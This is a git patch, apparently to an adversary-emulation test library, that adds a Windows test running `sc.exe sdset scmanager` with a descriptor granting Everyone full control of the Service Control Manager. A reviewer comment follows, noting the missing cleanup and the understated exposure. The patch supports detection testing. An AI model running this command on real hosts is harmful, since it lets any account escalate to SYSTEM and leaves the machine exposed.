From efa3370b62fef7affd1a731d6a0f379e983e856c Mon Sep 17 00:00:00 2001
From: abhijose09
Date: Wed, 15 May 2024 06:23:45 +0530
Subject: [PATCH] Update T1569.002.yaml (#2776)

* Update T1569.002.yaml
Added new test Modifying ACL of Service Control Manager via SDET
* correction
---------
Co-authored-by: Carrie Roberts
Co-authored-by: Hare Sudhan
---
 atomics/T1569.002/T1569.002.yaml | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)

diff --git a/atomics/T1569.002/T1569.002.yaml b/atomics/T1569.002/T1569.002.yaml
index 23f4c35d..b39d6c20 100644
--- a/atomics/T1569.002/T1569.002.yaml
+++ b/atomics/T1569.002/T1569.002.yaml
@@ -194,4 +194,15 @@ atomic_tests:
 cleanup_command: |
 sc.exe delete "WerFaultSvc"
 name: command_prompt
- elevation_required: true
\ No newline at end of file
+ elevation_required: true
+- name: Modifying ACL of Service Control Manager via SDET
+ description: |
+ Modify permissions of Service Control Manager via SDSET. This allows any administrative user to escalate privilege and create a service with SYSTEM level privileges.Restart is required.
+ [Blog](https://0xv1n.github.io/posts/scmanager/)
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ sc.exe sdset scmanager D:(A;;KA;;;WD)
+ name: command_prompt
+ elevation_required: true
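Review bot: The new test entry has no `cleanup_command`, so after it runs the host keeps the Service Control Manager descriptor written by `sc.exe sdset scmanager D:(A;;KA;;;WD)`, whereas the preceding test in this file removes what it created. Because `sdset` replaces the descriptor rather than appending to it, the original should be recorded before the change (for example with `sc.exe sdshow scmanager`) and restored afterwards, e.g. `cleanup_command: |` followed by `sc.exe sdset scmanager <ORIGINAL_SDDL>` (placeholder, not a real value). The description says "any administrative user", but `WD` is the Everyone SID, so the ACE appears to open the SCM to every account, including non-administrators. The wording should say that, and should note that the host stays exposed until the descriptor is restored. Minor: the test name says "SDET" where the description and command use SDSET/`sdset`, and a space is missing in "privileges.Restart".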